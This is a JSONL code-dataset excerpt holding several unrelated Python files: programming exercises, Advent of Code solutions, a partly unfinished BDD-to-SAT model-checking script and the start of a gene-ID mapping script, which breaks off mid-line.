video_cap_feature.append(caption_array)\n\n\n\n\n\n#\n","repo_name":"pawandeep2155/Video-Captioning-Using-Object-Trajectory-Features","sub_path":"MSVD/data_preprocess/video_cap2vec.py","file_name":"video_cap2vec.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"14327777974","text":"'''\nDay 2 \nYou are to write a program that finds the factorial of a numbergti .\n'''\ndef factorial_loop(number):\n '''\n this uses a for loop to find the factorial of a number\n '''\n result = 1\n for i in range(1, number+1):\n result *= i\n return result\nanynumber = int(input(\"Enter any nymber to find it's factorial >> \")) \nprint(factorial_loop(anynumber))","repo_name":"ConsonanceClub/100_Days_of_code_submissions","sub_path":"submissions/dbugshe2/day2/factorialFinderLoop.py","file_name":"factorialFinderLoop.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"8223955403","text":"def leiaDin(msg):\n ok = False\n v = 0\n while True:\n p = str(input(msg))\n if p.isnumeric():\n v = int(p)\n ok = True\n else:\n print('\\033[0;31mERRO! DIGITE UM VALOR VÁLIDO.\\033[m')\n if ok:\n break\n return v","repo_name":"pemedeiros/python-CeV","sub_path":"pacote-download/CursoemVideo/ex111/utilidadesCeV/dado/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4511782263","text":"with open(\"input\") as f:\n keys = [int(l.strip()) for l in f.readlines()]\n\nsub = 7\np = 20201227\nn = 0\nwhile True:\n if pow(sub, n, p) == keys[0]:\n loop_size = n\n break\n n += 1\n\nprint(pow(keys[1], loop_size, p))\n","repo_name":"madsthoisen/advent_of_code","sub_path":"2020/dec25/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3630387665","text":"# TEE RATKAISUSI TÄHÄN:\n\nclass Maksukortti:\n def __init__(self, saldo: float):\n self.saldo = saldo\n\n def lataa_rahaa(self, lisays: float):\n self.saldo += lisays\n\n def ota_rahaa(self, maara: float):\n if self.saldo >= maara:\n self.saldo -= maara\n return True\n else:\n return False\n # Toteuta metodi siten, että se ottaa kortilta rahaa vain, jos saldoa riittää\n # Onnistuessaan metodi palauttaa True ja muuten False\n\nclass Kassapaate:\n\n maukkaan_hinta = 4.3\n edullisen_hinta = 2.5\n \n def __init__(self):\n # kassassa on aluksi 1000 euroa rahaa\n self.rahaa = 1000\n self.edulliset = 0\n self.maukkaat = 0\n\n def syo_edullisesti(self, maksu: float):\n # Edullinen lounas maksaa 2.50 euroa\n # Kasvatetaan kassan rahamäärää edullisen lounaan hinnalla ja palautetaan vaihtorahat\n # Jos parametrina annettu maksu ei ole riittävän suuri, ei lounasta myydä ja metodi palauttaa koko summan\n if maksu >= self.edullisen_hinta:\n self.edulliset += 1\n self.rahaa += self.edullisen_hinta\n return maksu - self.edullisen_hinta\n else:\n return float(maksu)\n\n def syo_maukkaasti(self, maksu: float):\n # Maukas lounas maksaa 4.30 euroa\n # Kasvatetaan kassan rahamäärää maukkaan lounaan hinnalla ja palautetaan vaihtorahat\n # Jos parametrina annettu maksu ei ole riittävän suuri, ei lounasta myydä ja metodi palauttaa koko summan \n if maksu >= 4.3:\n self.maukkaat += 1\n self.rahaa += self.maukkaan_hinta\n return maksu - self.maukkaan_hinta\n else:\n return float(maksu)\n\n def syo_edullisesti_kortilla(self, kortti:Maksukortti):\n # Edullinen lounas maksaa 2.50 euroa\n # Jos kortilla on tarpeeksi rahaa, vähennetään hinta kortilta ja palautetaan True\n # Muuten palautetaan False\n if kortti.saldo >= self.edullisen_hinta:\n kortti.saldo -= self.edullisen_hinta\n self.edulliset += 1\n return True\n else:\n return False\n\n def syo_maukkaasti_kortilla(self, kortti:Maksukortti):\n # Maukas lounas maksaa 4.30 euroa\n # Jos kortilla on tarpeeksi rahaa, vähennetään hinta kortilta ja palautetaan True\n # Muuten palautetaan False\n if kortti.saldo >= self.maukkaan_hinta:\n kortti.saldo -= self.maukkaan_hinta\n self.maukkaat += 1\n return True\n else:\n return False\n\n def lataa_rahaa_kortille(self, kortti: Maksukortti, summa: float):\n self.rahaa += summa\n kortti.lataa_rahaa(summa) \n\n def __repr__(self):\n return f\"kassassa rahaa {self.rahaa} edullisia lounaita myyty {self.edulliset} maukkaita lounaita myyty {self.maukkaat}\"\n\n\n\nif __name__ == \"__main__\":\n\n exactum = Kassapaate()\n print(exactum)\n\n antin_kortti = Maksukortti(2)\n\n print(f\"kortilla rahaa {antin_kortti.saldo} euroa\")\n\n onnistuiko = exactum.syo_maukkaasti_kortilla(antin_kortti)\n print(\"riittikö raha:\", onnistuiko)\n\n exactum.lataa_rahaa_kortille(antin_kortti, 100)\n\n onnistuiko = exactum.syo_maukkaasti_kortilla(antin_kortti)\n print(\"riittikö raha:\", onnistuiko)\n\n print(f\"kortilla rahaa {antin_kortti.saldo} euroa\")\n\n print(exactum)","repo_name":"sami-one/mooc-ohjelmointi-21","sub_path":"osa09-04_maksukortti_ja_kassapaate/src/maksukortti_ja_kassapaate.py","file_name":"maksukortti_ja_kassapaate.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"fi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3243743266","text":"import sys\nimport os\nimport math\nfrom pyeda.inter import *\n\n# MODES\nST_BITS\t= 0 \nBDD_N0 \t= 1 \nBDD_LE \t= 2 \nTR_LV \t= 3 \nTR_NO \t= 4 \nTR_LE \t= 5 \n\t\nvars_Step = []\nlitCorr = dict()\n\ndef MC_to_SAT1(ini_S_inp, tgt_S_inp, bdd_inp, coins_inp ,K_inp,trace_file,out_file=\"\"):\n\t# func_argv = [\"\",inp_file,out_file,trace_file]\n\t# value is scaled to coins\n\tglobal vars_Step\n\tglobal litCorr\n\n\tdef equi_clause(p,q):\n\t\t\tclses = []\n\t\t\tclses.append([[not(p[0]),p[1]],q])\n\t\t\tclses.append([p,[not(q[0]),q[1]]])\n\t\t\treturn clses\n\n\tdef equi_clause_and_list(p,lst):\n\t\t\tclses = []\n\t\t\tclses.append([p] + [[not(l[0]),l[1]] for l in lst])\n\t\t\tfor l in lst:\n\t\t\t\tclses.append([[not(p[0]),p[1]],l])\n\t\t\treturn clses\n\n\tdef equi_clause_list(p,lst):\n\t\t\tclses = []\n\t\t\tclses.append([[not(p[0]),p[1]]]+lst)\n\t\t\tfor lit in lst:\t\n\t\t\t\tclses.append([p,[not(lit[0]),lit[1]]])\n\t\t\treturn clses\n\n\tdef get_sbit(lvl):\n\t\tlvltree = lvl - 10\n\t\treturn lvltree\n\n\tdef litCorrGen(inps):\n\t\tglobal litCorr\n\t\tglobal vars_Step\n\t\t\n\t\tdiff = set(inps) - set(vars_Step)\n\t\ts1 = len(inps)\n\t\ts2 = len(vars_Step)\n\t\td = len(diff)\n\t\tdiff2 = list(diff)\n\n\t\tfor aux_i in range(len(diff2)):\n\t\t\taux = diff2[aux_i]\n\t\t\tlitCorr[inps.index(aux)] = s2 + aux_i + 1\n\t\t\n\t\tfor v_i in range(len(vars_Step)):\n\t\t\tv = vars_Step[v_i]\n\t\t\tlitCorr[inps.index(v)] = v_i + 1\n\t\t\n\t\tprint(len(inps))\n\n\n\tdef parse_Ast(expr_ast):\n\t\t# lits = set()\n\t\tlits = 0\n\t\tclauses = []\n\t\tif expr_ast[0] == 'and':\n\t\t\tfor exp in expr_ast[1:]:\n\t\t\t\tcl1,lits1 = parse_Ast(exp)\n\t\t\t\tlits = max(lits1,lits)\n\t\t\t\tclauses += cl1\n\n\t\tif expr_ast[0] == 'or':\n\t\t\tclause = []\n\t\t\tfor exp in expr_ast[1:]:\n\t\t\t\tcl1,lits1 = parse_Ast(exp)\n\t\t\t\tlits = max(lits1,lits)\n\t\t\t\tclause += cl1[0]\n\t\t\tclauses = [clause]\n\n\t\tif expr_ast[0] == 'lit':\n\t\t\tlit = expr_ast[1]\n\t\t\tif lit < 0:\n\t\t\t\tlits = -1*lit\n\t\t\t\tclauses = [[ [litCorr[lits], False] ]]\n\t\t\telse:\n\t\t\t\tlits = lit\n\t\t\t\tclauses = [[ [litCorr[lits], True] ]]\n\t\t\t\n\t\tif expr_ast[0] == 'const':\n\t\t\tlits = 1\n\t\t\tif expr_ast[1] == 1:\n\t\t\t\tclauses = [[ [1, True] [1, False] ]]\n\t\t\tif expr_ast[1] == 0:\n\t\t\t\tclauses = [[ ]]\n\t\t\t\n\t\treturn clauses,lits\n\n\n\tclauses=[]\n\tK = K_inp\n\ttgt_S = tgt_S_inp\n\tini_S = ini_S_inp\n\tcoins = coins_inp\n\t# List of nodes and list of leaves\n\t# bdds[0] ==> [id,var,low,high] node\n\t# bdds[1] ==> [id,type,\"value\"] leaves\n\t# value is scaled\n\tbdd = bdd_inp\n\t\n\t# MODES\n\t# 0 S(k,i)\n\t# 1 bdd nodes\n\t# 2 bdd leaves\n\t# 3 tree levels\n\t# 4 tree nodes\n\t# 5 tree leaves\n\tI = []\n\tfor i1 in range(len(ini_S)):\n\t\tx = ini_S[i1]\n\t\tif x==0:\n\t\t\tI.append([False,[ST_BITS,0,i1]])\n\t\telse:\n\t\t\tI.append([True,[ST_BITS,0,i1]])\n\t\n\tF = []\n\tfor i1 in range(len(tgt_S)):\n\t\tx = tgt_S[i1]\n\t\tif x==0:\n\t\t\tF.append([False,[ST_BITS,0,i1]])\n\t\telse:\n\t\t\tI.append([True,[ST_BITS,0,i1]])\n\n\t# clauses = clauses + I\n\n\tpar_cond = [[] for x in range(len(bdd[0]) + len(bdd[1])+1)] \n\tpar_expr = [[] for x in range(len(bdd[0]) + len(bdd[1])+1)] \n\t\n\t# vars_Step = dict()\n\t\n\tbdd_vars = [exprvar((\"bdd_\"+str(x))) for x in range(len(bdd[0]) + len(bdd[1])+1)]\n\t\n\tvars_Step += bdd_vars[1:]\n\t# for var_i in range(1,len(bdd_vars)):\n\t# \tvars_Step[bdd_vars[var_i]] = var_i + (len(ini_S)*2)\n\t\t\n\tfor node in bdd[0]:\n\t\tlcd = node[2]\n\t\trcd = node[3]\n\t\tpar_cond[lcd].append([get_sbit(node[1]),node[0],False])\n\t\tpar_cond[rcd].append([get_sbit(node[1]),node[0],True])\n\t\n\ts_vars = [0 for x in range(len(ini_S) *2)] \n\tfor sb_i in range(len(s_vars)):\n\t\tstr_i = \"s_\" + str(sb_i)\n\t\ts_vars[sb_i] = exprvar(str_i)\n\n\tvars_Step += s_vars\n\t# for var_i in range(len(s_vars)):\n\t# \tvars_Step[s_vars[var_i]] = var_i + 1\n\n\tfor pc_i in range(1,len(par_cond)):\n\t\tpc = par_cond[pc_i]\n\t\tnode_expr = expr(0)\n\t\tfor cond in pc:\n\t\t\tif cond[2] == 0:\t\n\t\t\t\tnode_expr = Or(node_expr,And(bdd_vars[cond[1]],Not(s_vars[cond[0]])))\n\t\t\telse:\t\n\t\t\t\tnode_expr = Or(node_expr,And(bdd_vars[cond[1]],s_vars[cond[0]]))\n\n\t\t\t# node_expr = node_expr.to_cnf()\n\t\tnode_expr = Equal(bdd_vars[pc_i],node_expr)\n\t\tpar_expr[pc_i] = node_expr.tseitin()\n\t# Root of BDD true\n\tpar_expr[len(bdd[0]) + len(bdd[1])] = bdd_vars[len(bdd[0]) + len(bdd[1])]\n\t\n\tbdd_expr = expr(1)\n\tfor p_expr in par_expr[1:]:\n\t\tbdd_expr = And(bdd_expr,p_expr)\n\tbdd_expr = bdd_expr.tseitin()\n\n\ttreeN_vars = [exprvar((\"treeN_\"+str(x))) for x in range(coins*2 + 1)]\n\ttreeL_vars = [exprvar((\"treeL_\"+str(x))) for x in range(coins)]\n\ttree_expr_ske = treeN_vars[0]\n\t\n\tvars_Step += (treeN_vars + treeL_vars)\n\n\t# for var_i in range(len(treeN_vars)):\n\t# \tvars_Step[treeN_vars[var_i]] = var_i + 1 + (len(ini_S)*2) + \\\n\t# \t\t\t\t\t\t\t\t\tlen(bdd[0]) + len(bdd[1])\n\t# for var_i in range(len(treeL_vars)):\n\t# \tvars_Step[treeL_vars[var_i]] = var_i + 1 + (len(ini_S)*2) + \\\n\t# \t\t\t\t\t\t\t\t\tlen(bdd[0]) + len(bdd[1]) + \\\n\t# \t\t\t\t\t\t\t\t\tlen(treeN_vars)\n\t\n\tfor coin_i in range(coins):\n\t\tlvl = coin_i+1\n\t\ttree_expr_ske = And(tree_expr_ske,\n\t\t\t\t\t\tEqual(treeN_vars[lvl*2], And(treeN_vars[(lvl-1)*2], treeL_vars[coin_i])) ,\n\t\t\t\t\t\tEqual(treeN_vars[lvl*2 - 1], And(treeN_vars[(lvl-1)*2], Not(treeL_vars[coin_i]))) ) \n\t\n\t# tree_expr = tree_expr_ske.tseitin()\t\t\n\ttree_expr = tree_expr_ske\t\t\n\t\n\t\n\tbcnt_exprs = [expr(0) for x in range(len(bdd[1]))]\n\tfor leaf_i in range(len(bdd[1])):\n\t\tleaf = bdd[1][leaf_i]\n\t\tval = leaf[2]\n\t\t# val = bin(int(val))[2:] \n\t\tif val[0] == '1':\n\t\t\tbcnt_exprs[leaf_i] = expr(1)\n\t\telse:\t\n\t\t\tfor bit_i in range(len(val[1:])) :\n\t\t\t\tbit = val[bit_i + 1]\n\t\t\t\tlvl = bit_i + 1\n\t\t\t\tif bit == '1':\n\t\t\t\t\tbcnt_exprs[leaf_i] = Or(bcnt_exprs[leaf_i],\n\t\t\t\t\t\t\t\t\t\t\ttreeN_vars[lvl*2 - 1])\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\t\ttree_expr = And(tree_expr,\n\t\t\t\t\t\tImplies(bdd_vars[leaf[0]], bcnt_exprs[leaf_i]))\n\n\ttree_expr = tree_expr.tseitin()\n\n\tsstep_expr = And(bdd_expr,tree_expr)\n\tsstep_expr = sstep_expr.tseitin()\n\n\tlits=[]\t\n\tclauses=[]\t\n\n\texpr_ast = sstep_expr.to_ast()\n\tprint(expr_ast)\n\tprint(sstep_expr.inputs)\n\tlitCorrGen(sstep_expr.inputs)\n\tclauses,lits = parse_Ast(expr_ast)\n\t# list of lits\n\t# lit :: [no, t/f]\n\n\t# 1 to 2*log(S) \n\t# +1 to + len bdd_vars \n\t# +1 to + tree nodes\n\t# +1 to + tree levels\n\n\tsst_Vars = len(ini_S) * 2\n\tsbdd_Vars = len(bdd[0]) + len(bdd[1])\n\tstreeN_Vars = 2*coins + 1 \n\tstreeL_Vars = coins \n\tsaux_Vars = lits - (sst_Vars + sbdd_Vars + streeN_Vars + streeL_Vars)\n\n\tsLst_Vars = len(ini_S) * 2\n\tsLbdd_Vars = len(bdd[0]) + len(bdd[1]) + sLst_Vars\n\tsLtreeN_Vars = 2*coins + 1 + sLbdd_Vars\n\tsLtreeL_Vars = coins + sLtreeN_Vars\n\tsLaux_Vars = lits \n\t\n\n\tcurrLits = lits\n\tnewLits = currLits - len(ini_S)\n\n\tI = []\n\tfor i1 in range(len(ini_S)):\n\t\tx = ini_S[i1]\n\t\tif x==0:\n\t\t\tI.append([[1 + i1*2, False]])\n\t\telse:\n\t\t\tI.append([[1 + i1*2, True]])\n\tFclauses = I\n\t\n\tF = []\n\tfor i1 in range(len(tgt_S)):\n\t\tx = tgt_S[i1]\n\t\tif K>0:\n\t\t\tif K==1:\n\t\t\t\ttgtVar = 1 + i1*2 + 1\n\t\t\telse:\n\t\t\t\ttgtVar = 1 + currLits + newLits*(K-2) + i1\n\t\telse:\n\t\t\ttgtVar = 1 + i1*2\n\t\tif x==0:\n\t\t\tF.append([[tgtVar, False]])\n\t\telse:\n\t\t\tF.append([[tgtVar, True]])\t\n\tFclauses += F\n\n\tFclauses += clauses\n\t\n\tclauses2 = []\n\tif K > 1:\t\n\t\tfor clause in clauses:\n\t\t\ttemp = []\n\t\t\tfor lit in clause:\n\t\t\t\tif lit[0] <= sLst_Vars: \n\t\t\t\t\tif lit[0]%2 == 1:\n\t\t\t\t\t\ttemp.append([lit[0]+1, lit[1]])\n\t\t\t\t\telse:\n\t\t\t\t\t\ttemp.append([(lit[0])/2 + currLits , lit[1]])\t\n\t\t\t\telse: \n\t\t\t\t\ttemp.append([lit[0]+ newLits, lit[1]])\n\t\t\tclauses2.append(temp)\n\tFclauses += clauses2\n\n\tfor clause_i in clauses:\n\t\tclause = clauses[clause_i]\n\t\tfor lit_i in clause:\n\t\t\tlit = clause[lit_i]\n\t\t\tif lit[0] <= sLst_Vars: \n\t\t\t\tif lit[0]%2 == 1:\n\t\t\t\t\tclauses[clause_i][lit_i][0] = (lit[0]+1)/2 + len(ini_S)\n\t\t\t\telse:\n\t\t\t\t\tclauses[clause_i][lit_i][0] = (lit[0])/2 + currLits\t\n\t\t\telse: \n\t\t\t\tclauses[clause_i][lit_i][0] = lit[0] + newLits\n\t\tclauses.append(temp)\n\t\n\tfor k_i in range(3,K+1):\n\t\tfor clause in clauses:\n\t\t\ttemp = []\n\t\t\tfor lit in clause:\n\t\t\t\ttemp.append([lit[0] + newLits*(k_i-2) , lit[1]])\n\t\t\tFclauses.append(temp)\n\n\ttotLits = newLits*K + currLits\n\n\tindVars = [x for x in range(1,(len(ini_S)*2)+1)]\n\tindVars += [x for x in range(sLtreeN_Vars + 1, streeL_Vars + 1)]\n\n\tfor k_i in range(2,K+1):\n\t\tindVars += \t(list(range(1 + currLits + (k_i-2)*newLits , \n\t\t\t\t\t\t 1 + currLits + (k_i-2)*newLits + len(ini_S))) \\\n\t\t\t\t\t+\n\t\t\t\t\t list(range(1 + currLits + (k_i-2)*newLits + sLtreeN_Vars - len(ini_S), \n\t\t\t\t\t\t 1 + currLits + (k_i-2)*newLits + sLtreeL_Vars - len(ini_S))))\n\n\n\treturn Fclauses,totLits,indVars\n\n\n\n\n\n# \tstep_vars = sstep_expr.inputs\n# \ttot_step_vars = len(step_vars)\n# \taux_step_vars = tot_step_vars - \n\n\n\n\n\n# \ttemp_vars=0\n# \ts_temps = [[] for x in range(S)]\n# \ts_pre_temps = [[] for x in range(S)]\n# \t# print(coins)\n\n# \tfor k in range(1,K+1):\n# \t\ts_temps = [[] for x in range(S)]\n# \t\tfor s_no in range(S):\n# \t\t\tfor a_i in range(A):\t\n# \t\t\t\t# act_k_s = int_Acts[k][s_no]\n# \t\t\t\t# pmf=pmfs[s_no][act_k_s]\n# \t\t\t\tpmf=pmfs[s_no][a_i]\n# \t\t\t\tpmf_clauses,var_added,root_var,s_ts = pmf_SAT.pmf_to_SAT1(pmf,coins,temp_vars,k,s_no)\n\n# \t\t\t\t# t <==> s\n# \t\t\t\tt=root_var\n# \t\t\t\ts_lst = [[True,[0,s_no + (k-1)*S]]]\n# \t\t\t\tcurr_Act = a_i\n# \t\t\t\tfor a_x in range(num_act_bits):\n# \t\t\t\t\tnext_bit = curr_Act%2\n# \t\t\t\t\tcurr_Act = curr_Act/2\n# \t\t\t\t\t# print(num_act_bits - 1 - a_x)\n# \t\t\t\t\tif(next_bit == 1):\t\n# \t\t\t\t\t\ts_lst.append([True,[3,[k-1,s_no,num_act_bits - 1 - a_x]]])\n# \t\t\t\t\telse:\n# \t\t\t\t\t\ts_lst.append([False,[3,[k-1,s_no,num_act_bits - 1 - a_x]]])\n\n# \t\t\t\t# clauses = clauses + equi_clause(s,t) + pmf_clauses\n# \t\t\t\tclauses = clauses + equi_clause_and_list(t,s_lst) + pmf_clauses\n# \t\t\t\ttemp_vars += var_added\n\n# \t\t\t\tfor s_j in range(S):\n# \t\t\t\t\ts_temps[s_j] = s_temps[s_j] + s_ts[s_j]\n\n# \t\t\t# print(s_ts)\n# \t\t# clauses += equi_clause_list([True,[0,s_no+ S*k]],[[True,[3,[s_no+ S*k,x]]] for x in range(S)])\n# \t\tfor s_no in range(S):\n# \t\t\tclauses += equi_clause_list([True,[0,s_no+ S*k]],s_temps[s_no])\n\t\t\t\n# \t\t\t# print(var_added)\n\n# \tF = [[True,[0,tgt_S + x*S]] for x in range(K+1)]\n# \tclauses.append(F)\n\n\t# f=open(out_file,\"w\")\n# \t# total_Vars = loc_temp_vars - 1\n# \ttot_StateVars = (K+1)*S\n# \ttot_act_Vars = num_act_bits*K*S\n# \ttotal_Vars = tot_StateVars + coins*K + temp_vars + tot_act_Vars\n# \ttot_s_temp_vars = (S*K*S)\n\t# f.write(\"c ind\")\n\t# for x in range(K+1):\n\t\t# for y in range(coins):\t\n\t\t\t# f.write(\" \"+str(y + x*coins + tot_StateVars + 1))\n# \t# f.write(\" 0\\n\")\n# \t# f.write(\"p cnf \"+str(total_Vars)+\" \"+str(len(clauses))+\"\\n\")\n# \t# f.write(\"c\\n\")\n\n# \t# print(tot_StateVars)\n# \t# print(coins*K)\n# \t# print(temp_vars)\n# \t# print(tot_act_Vars)\n\n# \tfor i in range(len(clauses)):\n# \t\tc = clauses[i]\n# \t\t# f.write(str(i))\n# \t\tfor lit in c:\n# \t\t\tif lit[0]==False:\n# \t\t\t\tf.write(\"-\")\n# \t\t\tif lit[1][0] == 0:\n# \t\t\t\tf.write(str(lit[1][1] + 1))\t\t\n# \t\t\tif lit[1][0] == 1:\n# \t\t\t\tf.write(str(lit[1][1] + tot_StateVars + 1))\t\t\n# \t\t\tif lit[1][0] == 2:\n# \t\t\t\tf.write(str(lit[1][1] + tot_StateVars + coins*K + 1))\t\n# \t\t\tif lit[1][0] == 3:\n# \t\t\t\tf.write(str(lit[1][1][0]*S*num_act_bits + lit[1][1][1]*num_act_bits + lit[1][1][2] + tot_StateVars + coins*K + temp_vars + 1))\t\n# \t\t\t\t# f.write(str(lit[1][1][0]) lit[1][1][1]*num_act_bits + lit[1][1][2] + tot_StateVars + coins*K + temp_vars + 1))\t\n# \t\t\t# \tf.write(str(lit[1][1][1] + S*(lit[1][1][0]-S) + tot_StateVars + coins*K + 1))\t\t\n# \t\t\tf.write(\" \")\n# \t\tf.write(\"0\\n\")\n\n# \tf.close()\n\n# \tf=open(trace_file,\"w\")\n\n# \tf.write(str(tot_StateVars) + \"\\n\")\n# \tf.write(str(coins*K) + \"\\n\")\n# \tf.write(str(temp_vars) + \"\\n\")\n# \tf.write(str(tot_act_Vars) + \"\\n\")\n\n\n# \tf.write(\"c ind\")\n# \tfor x in range(K):\n# \t\tfor y in range(coins):\t\n# \t\t\tf.write(\" \"+str(y + x*coins + tot_StateVars + 1))\n# \tf.write(\"\\n\")\n# \tf.write(\"p cnf \"+str(total_Vars)+\" \"+str(len(clauses))+\"\\n\")\n\n# \tfor i in range(len(clauses)):\n# \t\tc = clauses[i]\n# \t\t# f.write(str(i))\n# \t\tfor lit in c:\n# \t\t\tif lit[0]==False:\n# \t\t\t\tf.write(\"-\")\n# \t\t\tif lit[1][0] == 0:\n# \t\t\t\tf.write(\"s\"+str(lit[1][1]))\t\n# \t\t\tif lit[1][0] == 1:\n# \t\t\t\tf.write(\"c\"+str(lit[1][1]))\t\n# \t\t\tif lit[1][0] == 2:\n# \t\t\t\tf.write(\"t\"+str(lit[1][1]))\t\n# \t\t\tif lit[1][0] == 3:\n# \t\t\t\tf.write(\"a\"+str(lit[1][1][0])+\".\"+str(lit[1][1][1])+\".\"+str(lit[1][1][2]))\t\n# \t\t\t\t# f.write(str(lit[1][1][0]) lit[1][1][1]*num_act_bits + lit[1][1][2] + tot_StateVars + coins*K + temp_vars + 1))\t\n# \t\t\t# \tf.write(str(lit[1][1][1] + S*(lit[1][1][0]-S) + tot_StateVars + coins*K + 1))\t\t\n# \t\t\tf.write(\"\\t\\t\")\n# \t\tf.write(\"0\\n\")\n# \tf.close()\n\n# \treturn act_bits_list\n\n# # os.system(\"approxmc --seed 42 \"+func_argv[2])\n\n# # for c in clauses:\n# # \t\tfor lit in c:\n# # \t\t\tif not lit[0]:\n# # \t\t\t\t\tprint(\"~\",end=\"\")\n# # \t\t\telse:\n# # \t\t\t\t\tprint(\" \",end=\"\")\n# # \t\t\tif lit[1][0] == 0:\n# # \t\t\t\tprint(\"s\",end=\"\")\n# # \t\t\tif lit[1][0] == 1:\n# # \t\t\t\tprint(\"c\",end=\"\")\n# # \t\t\tif lit[1][0] == 2:\n# # \t\t\t\tprint(\"t\",end=\"\")\n# # \t\t\tprint(str(lit[1][1]),end=\"\\t\")\n# # \t\tprint(\"\")\n\t\n","repo_name":"Deep-Karkhanis/BoundedModelChecking","sub_path":"BDD_SAT/MC_to_SAT.py","file_name":"MC_to_SAT.py","file_ext":"py","file_size_in_byte":12367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39162670354","text":"from typing import List\n\n\nclass Solution:\n def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:\n d1 = dict()\n for i in nums1:\n if i not in d1:\n d1.setdefault(i, 1)\n else:\n d1[i] += 1\n ans = []\n for i in nums2:\n if i in d1 and i not in ans:\n ans.append(i)\n return ans","repo_name":"BiqiangWang/leetcode","sub_path":"DataStructure/hash_map/349.py","file_name":"349.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24510789004","text":"import math\r\nimport sys\r\nfrom timeit import default_timer as timer\r\nfrom zUtils.utils import *\r\nfrom day11_1 import Monkey, print_monkeys\r\n\r\ndata: list[str] = []\r\n\r\n# FILENAME FOR INPUT DATA\r\nINPUT_FILENAME: str = \"11.txt\"\r\n\r\n\r\ndef main():\r\n\r\n # INIT\r\n # Code for startup\r\n start_time = timer()\r\n data = advent_init(INPUT_FILENAME, sys.argv, clear_screen=True)\r\n\r\n monkeys = []\r\n for i in range(0, len(data), 7):\r\n monkeys.append(Monkey(data[i:i+6]))\r\n\r\n # HERE WE GO\r\n iterations = 10000\r\n cut = 2\r\n relief = 1\r\n\r\n # Relief needs to be the lowest common multiple of all the monkeys\r\n # That way we can keep the numbers small but they still pass all the tests\r\n relief = math.prod(list([m.test for m in monkeys]))\r\n\r\n for iteration in range(iterations):\r\n for monkey in monkeys:\r\n monkey.do(relief, True, monkeys)\r\n if (iteration+1) % 1000 == 0:\r\n clear()\r\n printDebug(f\"Round {iteration+1}\")\r\n print_monkeys(monkeys)\r\n\r\n monkeys_to_multiply = sorted(monkeys, key=lambda x: x.inspection_count)[-cut:]\r\n\r\n printGood(math.prod([i.inspection_count for i in monkeys_to_multiply]))\r\n printOK(\"Time: %.5f seconds\" % (timer()-start_time))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"ZachAttakk/adventofcode","sub_path":"2022/day11_2.py","file_name":"day11_2.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27201472272","text":"import re\n\nfrom src import babel_utils\nfrom src.prefixes import OMIM,ENSEMBL,NCBIGENE,WORMBASE, MGI, ZFIN, DICTYBASE, FLYBASE, RGD, SGD, HGNC, UMLS\nfrom src.categories import GENE\n\nimport src.datahandlers.umls as umls\n\nfrom src.babel_utils import read_identifier_file,glom,write_compendium\n\nimport os\nimport json\nimport gzip\n\nimport logging\nfrom src.util import LoggingUtil\nlogger = LoggingUtil.init_logging(__name__, level=logging.ERROR)\n\ndef write_mods_ids(dd,id,modlist):\n for mod in modlist:\n with open(f'{dd}/{mod}/labels','r') as inf, open(f'{id}/gene/ids/{mod}','w') as outf:\n for line in inf:\n x = line.split('\\t')[0]\n outf.write(f'{x}\\n')\n\ndef build_gene_ensembl_relationships(ensembl_dir, outfile):\n \"\"\"Loop over all the ensembl species. Find any protein-coding gene\"\"\"\n with open(outfile,'w') as outf:\n #find all the ensembl directories\n dirlisting = os.listdir(ensembl_dir)\n for dl in dirlisting:\n dlpath = os.path.join(ensembl_dir,dl)\n if os.path.isdir(dlpath):\n infname = os.path.join(dlpath,'BioMart.tsv')\n if os.path.exists(infname):\n #open each ensembl file, find the id column, and put it in the output\n with open(infname,'r') as inf:\n wrote=set()\n h = inf.readline()\n x = h[:-1].split('\\t')\n gene_column = x.index('Gene stable ID')\n column_to_prefix = { 'NCBI gene (formerly Entrezgene) ID': {NCBIGENE},\n 'ZFIN ID': {ZFIN},\n 'SGD gene name ID': {SGD},\n 'WormBase Gene ID': {WORMBASE},\n 'FlyBase ID': {FLYBASE},\n 'MGI ID': {MGI},\n 'RGD ID': {RGD}\n }\n protein_column = x.index('Protein stable ID')\n columnno_to_prefix = {}\n for i,v in enumerate(x):\n if v in column_to_prefix:\n columnno_to_prefix[i] = column_to_prefix[v]\n for line in inf:\n x = line[:-1].split('\\t')\n #Is it protein coding?\n #Protein coding is not actually relevant.\n #if x[protein_column] == '':\n # continue\n gene_id = x[gene_column]\n gid = f'{ENSEMBL}:{gene_id}'\n for cno,pref in columnno_to_prefix.items():\n value = x[cno]\n if len(value) > 0:\n outf.write(f'{gid}\\teq\\t{pref}:{value}\\n')\n\n # If the ENSEMBL ID is a version string (e.g. ENSEMBL:ENSP00000263368.3),\n # then we should indicate that this is identical to the non-versioned string\n # as well.\n # See https://github.com/TranslatorSRI/Babel/issues/72 for details.\n res = re.match(r\"^([A-Z]+\\d+)\\.\\d+\", gene_id)\n if res:\n ensembl_id_without_version = res.group(1)\n outf.write(f'{ENSEMBL}:{ensembl_id_without_version}\\teq\\t{gid}\\n')\n\ndef write_zfin_ids(infile,outfile):\n with open(infile,'r') as inf, open(outfile,'w') as outf:\n for line in inf:\n x = line.strip().split()\n if 'GENE' in x[0]:\n outf.write(f'{ZFIN}:{x[0]}')\n\ndef write_hgnc_ids(infile,outfile):\n with open(infile,'r') as inf:\n hgnc_json = 